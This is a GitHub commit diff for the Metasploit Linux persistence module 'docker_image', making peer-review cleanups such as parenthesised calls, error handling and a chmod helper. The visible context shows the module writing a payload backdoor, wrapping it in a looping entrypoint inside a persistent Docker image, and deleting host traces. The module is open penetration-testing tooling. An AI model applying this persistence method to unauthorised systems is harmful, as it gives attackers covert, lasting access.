Skip to content

Commit 93bc79e

Browse files
h00dieh00die
committed
peer review for docker_image persistence
1 parent 2bf5264 commit 93bc79e

File tree

1 file changed

+7
-7
lines changed

1 file changed

+7
-7
lines changed

modules/exploits/linux/persistence/docker_image.rb

Lines changed: 7 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -49,7 +49,6 @@ def initialize(info = {})
4949
],
5050
'DisclosureDate' => '2013-03-20', # docker's release date
5151
'DefaultTarget' => 0,
52-
# https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
5352
'Notes' => {
5453
'Stability' => [CRASH_SAFE],
5554
'Reliability' => [REPEATABLE_SESSION],
@@ -80,7 +79,6 @@ def check
8079
return CheckCode::Safe('Docker is installed but this user does not have permission to access it')
8180
elsif output.include?('Cannot connect to the Docker daemon') || output.include?('Is the docker daemon running?')
8281
return CheckCode::Detected('Docker appears to be installed but the daemon is not running')
83-
# elsif output =~ /CONTAINER ID/
8482
end
8583

8684
CheckCode::Detected('docker app is installed and accessible')
@@ -91,7 +89,7 @@ def install_persistence
9189
file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
9290
backdoor = "#{writable_dir}/#{file_name}"
9391
vprint_status("Writing backdoor to #{backdoor}")
94-
upload_and_chmodx backdoor, generate_payload_exe
92+
upload_and_chmodx(backdoor, generate_payload_exe)
9593

9694
# Step 2: Prepare entrypoint script (loops indefinitely)
9795
sleep_time = datastore['SLEEP']
@@ -109,8 +107,10 @@ def install_persistence
109107
SCRIPT
110108

111109
entry_file = "#{writable_dir}/entrypoint.sh"
112-
write_file(entry_file, entry_script)
113-
cmd_exec("chmod 755 #{entry_file}")
110+
unless write_file(entry_file, entry_script)
111+
fail_with(Failure::UnexpectedReply, "Unable to write #{entry_file}")
112+
end
113+
chmod(entry_file, 0o755)
114114

115115
# Step 3: Pull Alpine image
116116
cmd_exec('docker pull alpine')
@@ -144,8 +144,8 @@ def install_persistence
144144
@clean_up_rc << "execute -f /bin/sh -a \"-c 'docker rmi #{persistent_image}'\" -i -H"
145145

146146
# Step 7: Clean up host temp files
147-
rm_f backdoor
148-
rm_f entry_file
147+
rm_f(backdoor)
148+
rm_f(entry_file)
149149

150150
# Step 8: Stop tmp image
151151
print_status('Stopping and removing temp container')

0 commit comments

Comments
 (0)